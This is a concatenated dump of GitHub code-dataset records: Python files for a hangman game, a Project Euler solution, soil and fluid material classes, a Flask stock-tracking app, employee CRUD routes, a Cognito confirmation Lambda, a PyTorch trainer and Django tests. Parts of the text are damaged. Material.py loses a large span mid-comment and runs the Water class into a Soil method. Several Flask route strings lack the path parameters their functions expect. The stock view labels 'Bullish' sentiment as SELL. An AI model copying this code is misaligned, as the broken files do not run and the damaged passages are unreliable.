chosen_word[num] == guess:\n\t\t\t\t\tdisplay[num] = guess\n\t\t\tprint(f'Letter a is in the word. {lives} lives left.\\n{stages[lives]}')\n\telse:\n\t\tif guess in guess_list:\n\t\t\tprint(f'You have already guessed {guess}. {lives} left.')\n\t\t\tprint(stages[lives])\n\t\telse:\n\t\t\tguess_list.append(guess)\n\t\t\tcorrect_guess = False\n\t\t\tlives -= 1\n\t\t\tprint(f'Letter {guess} is not in the word. You are left with {lives} lives.\\n{stages[lives]}')\n\n\tprint(display)\n\t# print(guess_list)\n\n\t#if no _ are present in the display and the user has guessed \n\t#all the letters then print You win\n\tif '_' not in display and lives>0:\n\t\tprint('You win')\n\t\n\t# if lives are equal to 0 then print sorry you loose\n\tif lives == 0 and '_' in display:\n\t\tprint(f'{stages[0]} \\n Sorry You Loose. The word was {chosen_word}')\n\n","repo_name":"vedavyas31/Python-Projects","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17306199279","text":"\"\"\"\nQuestion:\nA palindromic number reads the same both ways.\nThe largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\nfrom math import floor\n\nstart_pal = 1000000\nstart_int = 999\nstop_int = 100\n\ndef is_palindrome(test_int: int) -> bool:\n int_list = list(str(test_int))\n int_len = len(str(test_int))\n for i in range(floor(int_len/2)):\n if int_list[i] != int_list[int_len-i-1]:\n return False\n print(\"Found palindrome {}\".format(test_int))\n return True\n\n\ndef is_three_digit(test_int: int) -> bool:\n if len(str(test_int)) == 3:\n return True\n\n\nfor i in range(start_pal, 10000, -1):\n if is_palindrome(i):\n for j in range(start_int, stop_int, -1):\n k = i / j\n if k == round(k) and is_three_digit(round(k)):\n print(j, k)\n quit()","repo_name":"geooff/ProjectEulerSolutions","sub_path":"PE_Q4.py","file_name":"PE_Q4.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70912441069","text":"from math import sqrt, sin, exp, tan, pi, cos\n\nfrom AOD.Unit import *\nimport sys\n\n\nclass Material(object):\n \"\"\"Material class, the parent of all used materials\"\"\"\n _rho = 1000. * ureg['kg/m**3'] # private density\n _T = 15 * ureg['degC'] # private temperature\n _rho_func = None # private function for materials where density is a function of temperature\n _depth = 1. * ureg['m']\n\n def __str__(self):\n return r'Properties at ' + str(self.T.to('degC')) + '\\n' + 'density: ' + str(self.rho)\n\n def __init__(self, rho=None, T=None, rho_func=None):\n \"\"\"Constructor for Materials\"\"\"\n if rho is not None:\n self._rho = rho\n if T is not None:\n self._T = T\n else:\n self.T = 15\n if rho_func is not None:\n self._rho_func = rho_func\n\n @property\n def depth(self):\n return self._depth\n\n @depth.setter\n def depth(self, value):\n self._depth = value\n\n @property\n def T(self):\n \"\"\" Returns the current temperature of model\"\"\"\n return self._T\n\n @T.setter\n def T(self, value):\n \"\"\" Sets the new temperature, in degrees Celsius \"\"\"\n if type(value) is type(ureg['degC']):\n self._T = value\n else:\n self._T = value * ureg['degC']\n\n @property\n def rho(self):\n \"\"\" Gets the density of a material\"\"\"\n return self._rho\n\n @rho.setter\n def rho(self, value):\n \"\"\" Sets the density of a material\"\"\"\n self._rho = value\n\n\nclass Fluid(Material):\n _P = 0. * ureg['Pa'] # private pressure of the fluid\n _mu = 0. * ureg['Pa*s'] # private dynamic viscosity\n _mu_func = None # private dynamic viscosity\n\n def __init__(self, rho=None, rho_func=None, T=None, P=None, mu=None, mu_func=None):\n Material.__init__(self, T=T, rho=rho, rho_func=rho_func)\n if P is not None:\n self._P = P\n if mu is not None:\n self._mu = mu\n if mu_func is not None:\n self._mu_func = mu_func\n\n @property\n def P(self):\n return self._P\n\n @property\n def mu(self):\n \"\"\"Returns dynamic viscosity, when mu function is specified the function \n is applied, otherwise the private variable is returned\"\"\"\n if self._mu_func is not None:\n return self._mu_func(self.T.to('degC').magnitude)\n else:\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\" Sets the dynamic viscosity\"\"\"\n self._mu = value\n\n @property\n def nu(self):\n \"\"\" returns the kinematic viscosity\"\"\"\n return (self.mu / self.rho).to('m**2/s')\n\n\nclass Air(Fluid):\n _R = 0. * ureg['J/(kg*K)'] # private specific gas constant for dry air\n\n def __init__(self, T=None, P=None, R=None):\n if T is None:\n T = 15. * ureg['degC']\n if P is None:\n P = 101.325e3 * ureg['Pa']\n if R is None:\n self._R = 287.05 * ureg['J/(kg*K)']\n Fluid.__init__(self, rho=1.225 * ureg['kg/m**3'],\n rho_func=lambda p, r, t: p.to_base_units() / (r.to_base_units() * t.to('K')),\n T=T, P=P, mu=1.789e-5 * ureg['Pa*s'])\n self.depth = float('inf') * ureg['m']\n\n @property\n def R(self):\n return self._R\n\n @R.setter\n def R(self, value):\n self._R = value\n\n @property\n def rho(self):\n \"\"\" Returns the density of a air, when the material has a\n rho_function specified, the density is calculated using the ideal gas law, otherwise it is\n taken from the private variable \"\"\"\n if self._rho_func is not None:\n return self._rho_func(self.P, self.R, self.T)\n else:\n return self._rho\n\n\nclass Water(Fluid):\n \"\"\" Water material \"\"\"\n\n def __init__(self, T=None, P=None):\n \"\"\" Constructor of the water class\"\"\"\n if T is not None:\n self._T = T\n self._rho = 999.7 * ureg['kg/m**3']\n # Water density dependency on temperature (validity 5 ratio:\n return list(self._alpha.values())[0]\n for key in self._alpha.items():\n if key[0] > ratio:\n dR = ratio - prev_key\n dAlpha = self._alpha[key[0]] - self._alpha[prev_key]\n return self._alpha[prev_key] + dR * dAlpha / (key[0] - prev_key)\n else:\n prev_key = key[0]\n return self._alpha[prev_key]\n\n def alpha_bulldozer(self, sigma_sb, sigma_cb):\n ratio = sigma_sb / sigma_cb\n alpha = (-0.0262 * ratio ** 3 + 0.223 * ratio ** 2 - 0.6143 * ratio + 0.9509) + 0.1\n return alpha\n\n def gamma(self, layers):\n \"\"\" Submerged soil weight \"\"\"\n return g * (layers['Soil'].rho_ins - layers['Fluid'].rho)\n\n def sigma_h(self, load):\n \"\"\" Max Horizontal total soil stress assuming soil is at rest \"\"\"\n return load * self.k0\n\n @property\n def c(self):\n \"\"\" Gets the soil cohesion \"\"\"\n return self._c\n\n @c.setter\n def c(self, value):\n \"\"\" Sets the soil cohesion \"\"\"\n self._c = value\n\n @property\n def phi(self):\n \"\"\" Gets the soil internal friction angle \"\"\"\n return self._phi\n\n @phi.setter\n def phi(self, value):\n \"\"\" Sets the soil internal friction angle \"\"\"\n self._phi = value.to('rad')\n\n @property\n def k0(self):\n \"\"\" Gets the soil coeff. of lateral earth pressure \"\"\"\n return self._k0\n\n @k0.setter\n def k0(self, value):\n \"\"\" Sets the soil coeff. of lateral earth pressure\"\"\"\n self._k0 = value\n\n @property\n def delta(self):\n \"\"\" Gets the soil external friction angle \"\"\"\n return self._delta\n\n @delta.setter\n def delta(self, value):\n \"\"\" Sets the soil external friction angle \"\"\"\n self._delta = value.to('rad')\n\n @property\n def rho_ins(self):\n \"\"\" Gets the soil In-situ density \"\"\"\n return self._rho_ins\n\n @rho_ins.setter\n def rho_ins(self, value):\n \"\"\" Sets teh soil In-situ density \"\"\"\n self._rho_ins = value.to('kg/m**3')\n\n @property\n def N_q(self):\n \"\"\" Dimensionless constants in the Brinch-Hansen model (verruijt, 2009) \"\"\"\n return (1 + sin(self.phi)) / (1 - sin(self.phi)) * exp(pi * tan(self.phi))\n\n @property\n def N_gamma(self):\n return 2 * (self.N_q - 1) * tan(self.phi)\n\n @property\n def N_c(self):\n if self.phi == 0.:\n return 2 * pi\n else:\n return (self.N_q - 1) * (1 / tan(self.phi)) # TODO check if cot is 1/tan(alpha)\n\n def S_c(self, B, L):\n return 1. + 0.2 * (B / L)\n\n def S_q(self, B, L):\n return 1. + (B / L) * sin(self.phi)\n\n def S_gamma(self, B, L):\n return 1. - 0.3 * (B / L)\n\n def i_c(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n if p is not None and t is not None:\n ic = 1 - (t / (self.c * p * tan(self.phi)))\n return 1.\n\n def i_q(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n iq = self.i_c(p, t) ** 2\n return 1.\n\n def i_gamma(self, p=None, t=None):\n \"\"\" Inclination factor currently not used \"\"\"\n igamma = self.i_c(p, t) ** 3\n return 1.\n\n def p_allow(self, q, layers, B, L):\n \"\"\" Allowed load according to Brinch Hansen \"\"\"\n return self.i_c() * self.S_c(B, L) * self.c * self.N_c \\\n + self.i_q() * self.S_q(B, L) * q * self.N_q \\\n + self.i_gamma() * self.S_gamma(B, L) * 0.5 * self.gamma(layers) * B * self.N_gamma\n\n\nclass Silt(Soil):\n \"\"\" Predefined type of Soil, namely silt\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1300. * ureg['kg/m**3'], c=3.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=0.54 * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Loose_clay(Soil):\n \"\"\" Predefined type of Soil, namely Loose clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1400. * ureg['kg/m**3'], c=5.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=0. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Packed_clay(Soil):\n \"\"\" Predefined type of Soil, namely Packed clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=1800. * ureg['kg/m**3'], c=10.e3 * ureg['Pa'],\n phi=0. * ureg['degree'],\n k0=1. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass River_clay(Soil):\n \"\"\" Predefined type of Soil, namely River clay used during the test with project 64120-R02\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=(1.86 * ureg['kg/l'] + 1.88 * ureg['kg/l']) / 2,\n c=(4.2 * ureg['kPa'] + 3.1 * ureg['kPa']) / 2,\n phi=0. * ureg['degree'],\n k0=1. * ureg['dimensionless'], delta=0. * ureg['degree'])\n\n\nclass Sand(Soil):\n \"\"\" Predefined type of Soil, namely Packed clay\"\"\"\n\n def __init__(self):\n \"\"\" Constructor \"\"\"\n Soil.__init__(self, rho=2650. * ureg['kg/m**3'], rho_ins=2000. * ureg['kg/m**3'], c=0. * ureg['Pa'],\n phi=35. * ureg['degree'],\n k0=0. * ureg['dimensionless'], delta=35. / 3. * ureg['degree'])\n","repo_name":"jellespijker/AODbearingcap","sub_path":"AOD/Material.py","file_name":"Material.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40718428596","text":"# no-stall-GICS — Christopher Liu, Ivan Mijacika, Shyne Choi, Gavin McGinley\n# SoftDev\n# P01 — no-stock-GICS\n# 2022-01-04\n\n\"\"\"\nApp and Routes\n\nHandles Flask routing for the app.\n\"\"\"\n\n\nfrom os import remove, urandom\n\nfrom flask import Flask, render_template, redirect, session, url_for, request\n\nfrom user import (\n create_user,\n authenticate_user,\n get_user_id,\n get_favorites,\n add_favorite,\n remove_favorite,\n)\nfrom styvio import get_stock_sentiment\nfrom mediawiki import get_summary\nfrom yahoofinance import autocomplete, summary_data, price_chart, full_name\n\napp = Flask(__name__)\napp.secret_key = urandom(32)\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Displays homepage.\"\"\"\n if \"username\" in session:\n username = session[\"username\"]\n favorites = get_favorites(get_user_id(username))\n\n return render_template(\"home.html\", username=username, favorites=favorites)\n return render_template(\"guest.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Displays registration form and handles form response.\"\"\"\n if \"username\" in session:\n return redirect(url_for(\"index\"))\n\n # GET request: display the form\n if request.method == \"GET\":\n return render_template(\"register.html\")\n\n # POST request: handle the form response and redirect\n username = request.form.get(\"username\", default=\"\")\n password = request.form.get(\"password\", default=\"\")\n password_check = request.form.get(\"password_check\", default=\"\")\n\n errors = create_user(username, password, password_check)\n if errors:\n return render_template(\"register.html\", errors=errors)\n\n # Maybe put a flash message here to confirm everything works\n return redirect(url_for(\"login\")) # should be login\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Displays login form and handles form response.\"\"\"\n if \"username\" in session:\n return redirect(url_for(\"index\"))\n\n # GET request: display the form\n if request.method == \"GET\":\n return render_template(\"login.html\")\n\n # POST request: handle the form response and redirect\n username = request.form.get(\"username\", default=\"\")\n password = request.form.get(\"password\", default=\"\")\n\n if authenticate_user(username, password):\n session[\"username\"] = username\n return redirect(url_for(\"index\"))\n\n return render_template(\"login.html\", error=\"incorrect\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Logs out the current user.\"\"\"\n\n if \"username\" in session:\n del session[\"username\"]\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/search\")\ndef search():\n \"\"\"Displays a search result page containing possible autocomplete stock\n ticker symbols based on the search query.\"\"\"\n\n if \"searchquery\" not in request.args or request.args.get(\"searchquery\") == \"\":\n return redirect(url_for(\"index\"))\n\n search_query = request.args.get(\"searchquery\")\n autocomplete_results = autocomplete(search_query)\n\n favorites = None\n if \"username\" in session:\n favorites = get_favorites(get_user_id(session[\"username\"]))\n\n return render_template(\n \"search.html\",\n search_query=search_query,\n autocomplete_results=autocomplete_results,\n favorites=favorites,\n )\n\n\n@app.route(\"/stock/\")\ndef stock(ticker):\n \"\"\"Displays detailed information about the stock associated with the given\n ticker symbol.\"\"\"\n\n favorites = None\n is_favorite = False\n if \"username\" in session:\n favorites = get_favorites(get_user_id(session[\"username\"]))\n if ticker in favorites:\n is_favorite = True\n\n key_stats = summary_data(ticker)\n if key_stats is None:\n return render_template(\"not_found.html\", ticker=ticker, favorites=favorites)\n\n if key_stats:\n current_price = key_stats.pop(\"current_price\")\n else:\n current_price = \"N/A\"\n\n sentiment = get_stock_sentiment(ticker)\n if sentiment:\n logo_url = sentiment[\"logo\"]\n rating = sentiment[\"rating\"]\n recommendation = \"SELL\" if rating == \"Bullish\" else \"BUY\"\n else:\n logo_url = \"\"\n recommendation = \"N/A\"\n\n name = full_name(ticker)\n\n chart = price_chart(ticker)\n\n wiki_summary = get_summary(name)\n summary = wiki_summary[\"summary\"]\n wiki_link = wiki_summary[\"id\"]\n\n return render_template(\n \"stock.html\",\n name=name,\n ticker=ticker,\n logo_url=logo_url,\n current_price=current_price,\n recommendation=recommendation,\n key_stats=key_stats,\n summary=summary,\n wiki_link=wiki_link,\n chart=chart,\n favorites=favorites,\n is_favorite=is_favorite,\n )\n\n\n@app.route(\"/favorite/\")\ndef favorite(ticker):\n \"\"\"Favorites the given ticker if the user is logged in, redirects to\n login page if not.\"\"\"\n if \"username\" not in session:\n return redirect(url_for(\"login\"))\n\n add_favorite(get_user_id(session[\"username\"]), ticker)\n return redirect(url_for(\"stock\", ticker=ticker))\n\n\n@app.route(\"/unfavorite/\")\ndef unfavorite(ticker):\n \"\"\"Unfavorites the given ticker.\"\"\"\n if \"username\" not in session:\n return redirect(url_for(\"stock\", ticker=ticker))\n\n remove_favorite(get_user_id(session[\"username\"]), ticker)\n return redirect(url_for(\"stock\", ticker=ticker))\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"qiqimonkey4300/P01","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12908770132","text":"from flask import Blueprint, request, jsonify, make_response\n\nfrom database_setup import Employee\nfrom main.repository import employee_repository\n\nmod_employee = Blueprint('employee', __name__, url_prefix='/employee')\n\n\n@mod_employee.route(\"/\", methods=[\"PUT\"])\ndef create_employee():\n employee = Employee(project_id=request.get_json().get('project_id'),\n name=request.get_json().get('name'),\n title=request.get_json().get('title'),\n phone=request.get_json().get('phone'),\n seat=request.get_json().get('seat'))\n employee_repository.create_employee(employee)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n@mod_employee.route(\"/\", methods=[\"GET\"])\ndef get_employee_by_employee_id(employee_id):\n selected_employee = employee_repository.get_employee_from_employee_id(employee_id)\n return make_response(\n jsonify({'employee_id': selected_employee.id, 'project_id': selected_employee.project_id,\n 'name': selected_employee.name, 'title': selected_employee.title,\n 'phone': selected_employee.phone, 'seat': selected_employee.seat}), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"POST\"])\ndef edit_employee():\n employee = Employee(id=request.get_json().get('id'),\n project_id=request.get_json().get('project_id'),\n name=request.get_json().get('name'),\n title=request.get_json().get('title'),\n phone=request.get_json().get('phone'),\n seat=request.get_json().get('seat'))\n\n edited_employee = employee_repository.edit_employee(employee)\n return make_response(\n jsonify({'id': edited_employee.id, 'project_id': edited_employee.project_id,\n 'name': edited_employee.name, 'title': edited_employee.title,\n 'phone': edited_employee.phone, 'seat': edited_employee.seat}), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"GET\"])\ndef get_all_employee_list():\n employee_list_resp = employee_repository.get_all_employee_list()\n return make_response(jsonify(employee_list_resp), 200)\n\n\n@mod_employee.route(\"/\", methods=[\"DELETE\"])\ndef delete_employee_by_employee_id(employee_id):\n employee_repository.delete_employee_by_employee_id(employee_id)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n","repo_name":"1212091/python-learning","sub_path":"basic_web/main/controller/employee_controller.py","file_name":"employee_controller.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25840767593","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\n\nexample_url = \"https://en.wikipedia.org/wiki/Comparison_of_programming_languages\"\n\n\nurl = example_url\n\ndef scrape_for_data(url):\n html = urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.findAll(\"table\", {\"class\": \"wikitable\"})[0]\n rows = table.findAll(\"tr\")\n with open(\"data.csv\", \"wt+\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in rows:\n csv_row = []\n for cell in row.findAll([\"td\", \"th\"]):\n csv_row.append(cell.get_text())\n writer.writerow(csv_row)\n x = pd.read_csv(\"data.csv\")\n x.head()\n\n# scrape_for_data(url)\n","repo_name":"harric07/tinda","sub_path":"tinda/extras/web_scraping _for_dataset.py","file_name":"web_scraping _for_dataset.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41300813756","text":"from cmath import inf\nimport os\nimport json\nimport logging\nfrom http import HTTPStatus\nimport os\nimport boto3\nfrom dataclasses import dataclass\nimport re\nfrom utils import *\nfrom error_messages import *\nfrom response import *\nfrom config import *\nfrom custom_mail import *\nfrom datetime import datetime\n\nUSERPOOLID = os.environ['COGNITO_USER_POOL']\nCLIENTPOOLID = os.environ['COGNITO_CLIENT_ID']\nIDENTITY_POOL = os.environ['IDENTITY_POOL']\ncog_provider_client = boto3.client('cognito-idp')\ncog_identity_client = boto3.client('cognito-identity')\n\n\n@error_response\ndef lambda_handler(event, context):\n try:\n body = json.loads(event['body'])\n username = body['username']\n confirmCode = body['confirm_code']\n except Exception as e:\n print(\"error \", e)\n return generate_response(\n message=MessageUnmarshalInputJson,\n data={},\n headers=RESPONSE_HEADER\n )\n try:\n DeleteConfirmCode({\n 'region': REGION,\n 'user': username,\n 'code': confirmCode,\n 'confirm_code_Table': os.environ['TABLE_CONFIRM_CODE']\n })\n except Exception as e:\n raise Exception(e)\n _ = cog_provider_client.admin_confirm_sign_up(\n UserPoolId=USERPOOLID,\n Username=username\n )\n\n _ = cog_provider_client.admin_update_user_attributes(\n UserPoolId=USERPOOLID,\n Username=username,\n UserAttributes=[\n {\n 'Name': 'email_verified',\n 'Value': 'true'\n },\n ])\n return generate_response(message=\"Email successfully confirmed\", data={},\n headers=RESPONSE_HEADER\n )\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/core-service/functions/handlers/auth_service/auth_confirm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8636983038","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport os\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils.loader import get_loader\nimport opt\nfrom models.lossFun import FocalLoss\nimport utils.metrics as metrics\nimport pytorch_warmup as warmup\n\n\n\nclass Trainer():\n def __init__(self, model):\n self.save_dir = opt.save_dir\n self.data_dir = opt.data_dir\n self.batch_size = opt.batch_size\n self.number_workers= opt.number_workers\n self.time_tri= opt.time_tri\n self.useGAN= opt.useGAN\n self.device = opt.device\n self.model_name=opt.NAME\n self.accumulation_step=opt.accumulation_step\n self.max_epoch=opt.epochs\n self.filename=opt.filename\n\n os.makedirs(self.save_dir, exist_ok=True)\n self.train_loader, self.valid_loader, self.test_loader,_ = get_loader(self.data_dir,self.time_tri,self.batch_size,num_workers=self.number_workers)\n\n self.num_train = self.train_loader.dataset.tensors[0].size(0)\n self.num_valid = self.valid_loader.dataset.tensors[0].size(0)\n self.num_test = self.test_loader.dataset.tensors[0].size(0)\n\n print('Find %d train numbers, %d validation numbers, %d test numbers' %(self.num_train, self.num_valid,self.num_test))\n print('batch size %d' %(self.batch_size))\n\n self.model = model.to(self.device)\n\n if opt.optimizer == 'sgd':\n self.optimizer = torch.optim.SGD(self.model.parameters(),lr=opt.LEARNING_RATE,momentum=0.9)\n elif opt.optimizer == 'adam':\n self.optimizer = torch.optim.Adam(\n self.model.parameters(),\n lr=opt.LEARNING_RATE,\n weight_decay=opt.WEIGHT_DECAY\n )\n elif opt.optimizer=='adamw':\n self.optimizer=torch.optim.AdamW(self.model.parameters(),lr=opt.LEARNING_RATE,betas=(0.9, 0.999),weight_decay=opt.WEIGHT_DECAY)\n else:\n raise NotImplementedError\n if opt.lrsc==\"warmup\":\n self.lrsc=torch.optim.lr_scheduler.CosineAnnealingLR(self.optimizer, T_max=len(self.train_loader) * self.max_epoch)\n else:\n self.lrsc=torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, mode='min', factor=0.1, patience=3, verbose=True, threshold=0.0001, threshold_mode='rel', cooldown=0, min_lr=0, eps=1e-08)\n if opt.loss==\"Focal\":\n self.loss_fn=FocalLoss(logits=True,alpha=opt.ALPHA,gamma=opt.GAMMA)\n elif opt.loss==\"CE\":\n self.loss_fn=nn.CrossEntropyLoss()\n else:\n raise NotImplementedError\n self.start_epoch = 0\n self.best_loss = 1e10\n self.best_score = -1\n if opt.resume==True:\n if os.path.isfile(opt.resume_path):\n self.resume(opt.resume_path, load_optimizer=True)\n else:\n print(\"Checkpoint not found\")\n\n def resume(self, path, load_optimizer=True):\n print(\"Resuming from {}\".format(path))\n checkpoint = torch.load(path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.best_loss = checkpoint['best_loss']\n self.best_score = checkpoint['best_score']\n self.model.load_state_dict(checkpoint['state_dict'])\n if \"optimizer\" in checkpoint.keys() and load_optimizer:\n print(\"Loading optimizer state dict\")\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n def save_checkpoint(self, epoch, save_optimizer=True, suffix=\"\"):\n checkpoint = {\n \"epoch\": epoch,\n \"state_dict\": self.model.state_dict(),\n \"best_loss\": self.best_loss,\n \"best_score\": self.best_score\n }\n if save_optimizer:\n checkpoint['optimizer'] = self.optimizer.state_dict()\n save_path = self.save_dir +'weights/'+ self.model_name + \"_\" + suffix + \".pth\"\n os.makedirs(self.save_dir +'weights/', exist_ok=True)\n torch.save(checkpoint, save_path)\n # print(\"Save model checkpoint at {}\".format(save_path))\n\n def train(self, epoch):\n # start = time.strftime(\"%H:%M:%S\")\n # lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n # print(\"Starting epoch: %d | phase: train | ⏰: %s | Learning rate: %f\" %(epoch, start, lr))\n self.model.train()\n self.optimizer.zero_grad()\n # warmup\n # num_steps = len(dataloader) * epochs\n # warmup_scheduler = warmup.UntunedLinearWarmup(optimizer)\n y_predict=torch.tensor(()).to(self.device)\n y_true=torch.tensor(()).to(self.device)\n # tbar = tqdm(self.train_loader, desc=\"\\r\")\n total_losses = 0\n for batch, (X, y) in enumerate(self.train_loader):\n onehot_target=torch.eye(2)[y.long().cpu(), :].to(self.device)\n pred = self.model(X)\n y_predict=torch.cat([y_predict,pred.argmax(1)],dim=0)\n y_true=torch.cat([y_true,y],dim=0)\n loss = self.loss_fn(pred.reshape(-1,1,2), onehot_target)\n # 梯度累加\n total_losses += float(loss)\n loss /= self.accumulation_step\n loss.backward()\n if (batch + 1) % self.accumulation_step == 0:\n self.optimizer.step()\n self.optimizer.zero_grad()\n # tbar.set_description(\"Train loss: %.5f\" % (total_losses / (batch + 1)))\n # lr_scheduler.step(lr_scheduler.last_epoch+1)\n # warmup_scheduler.dampen()\n\n met=metrics.scores(y_true.cpu().numpy(),y_predict.cpu().numpy())\n return loss.item(),met\n\n def valid(self,dataloader,epoch):\n self.model.eval()\n # lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n # start = time.strftime(\"%H:%M:%S\")\n # print(\"Starting epoch: %d | phase: valid | ⏰: %s \" % (epoch, start))\n test_loss = 0\n y_predict=torch.tensor(()).to(self.device)\n y_true=torch.tensor(()).to(self.device)\n num_batches = len(dataloader)\n # tbar = tqdm(dataloader, desc=\"\\r\")\n for batch, (X, y) in enumerate(dataloader):\n with torch.no_grad():\n onehot_target=torch.eye(2)[y.long().cpu(), :].to(self.device)\n pred = self.model(X)\n y_predict=torch.cat([y_predict,pred.argmax(1)],dim=0)\n y_true=torch.cat([y_true,y],dim=0)\n test_loss += self.loss_fn(pred.reshape(-1,1,2), onehot_target).item()\n test_loss /= num_batches\n met=metrics.scores(y_true.cpu().numpy(),y_predict.cpu().numpy())\n return test_loss,met\n\n def start_train(self):\n pbar = tqdm(total=self.max_epoch-self.start_epoch)\n lastTmet={}\n lastmet={}\n if opt.lrsc==\"warmup\":\n warmup_scheduler = warmup.UntunedLinearWarmup(self.optimizer)\n for epoch in range(self.start_epoch, self.max_epoch):\n tloss,lastTmet=self.train(epoch)\n loss, lastmet = self.valid(self.valid_loader, epoch)\n #控制\n if opt.lrsc==\"warmup\":\n with warmup_scheduler.dampening():\n self.lrsc.step()\n else:\n self.lrsc.step(loss)\n if loss < self.best_loss:\n self.best_loss = loss\n self.best_score = lastTmet['accuracy']\n if epoch >= self.max_epoch // 2 and epoch % 10 == 0:\n self.save_checkpoint(epoch,save_optimizer=True,suffix=\"epoch\" + str(epoch)+self.filename)\n self.save_checkpoint(epoch, save_optimizer=True, suffix=\"last\"+self.filename)\n pbar.set_postfix({'val accuary:':lastmet['accuracy']}) \n pbar.update()\n test_lost,test_met=self.valid(self.test_loader,0)\n with open(self.save_dir + str(self.filename) + '_test_evaluate.txt', 'a+', encoding='utf8') as fw:\n fw.write(\"-----------模型预测评估-----------\\n\")\n fw.write(\"Trainscore:\\n\")\n fw.write(str(lastTmet))\n fw.write(\"\\n\")\n fw.write(\"Validscore:\\n\")\n fw.write(str(lastmet))\n fw.write(\"\\n\")\n fw.write(\"Testscore:\\n\")\n fw.write(str(test_met))\n fw.write(\"\\n\")\n fw.close()\n print(\"训练集上:\")\n print(lastTmet)\n print(\"验证集上:\")\n print(lastmet)\n print(\"测试集上:\")\n print(test_met)","repo_name":"hysyyds/GAN-BiLSTM","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6260884515","text":"from copy import deepcopy\n\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom example import models, serializers, views\n\npytestmark = pytest.mark.django_db\n\n\nclass _PatchedModel:\n class JSONAPIMeta:\n resource_name = \"resource_name_from_JSONAPIMeta\"\n\n\ndef _check_resource_and_relationship_comment_type_match(django_client):\n entry_response = django_client.get(reverse(\"entry-list\"))\n comment_response = django_client.get(reverse(\"comment-list\"))\n\n comment_resource_type = comment_response.json().get(\"data\")[0].get(\"type\")\n comment_relationship_type = (\n entry_response.json()\n .get(\"data\")[0]\n .get(\"relationships\")\n .get(\"comments\")\n .get(\"data\")[0]\n .get(\"type\")\n )\n\n assert (\n comment_resource_type == comment_relationship_type\n ), \"The resource type seen in the relationships and head resource do not match\"\n\n\ndef _check_relationship_and_included_comment_type_are_the_same(django_client, url):\n response = django_client.get(url + \"?include=comments\")\n data = response.json().get(\"data\")[0]\n comment = response.json().get(\"included\")[0]\n\n comment_relationship_type = (\n data.get(\"relationships\").get(\"comments\").get(\"data\")[0].get(\"type\")\n )\n comment_included_type = comment.get(\"type\")\n\n assert (\n comment_relationship_type == comment_included_type\n ), \"The resource type seen in the relationships and included do not match\"\n\n\n@pytest.mark.usefixtures(\"single_entry\")\nclass TestModelResourceName:\n create_data = {\n \"data\": {\n \"type\": \"resource_name_from_JSONAPIMeta\",\n \"id\": None,\n 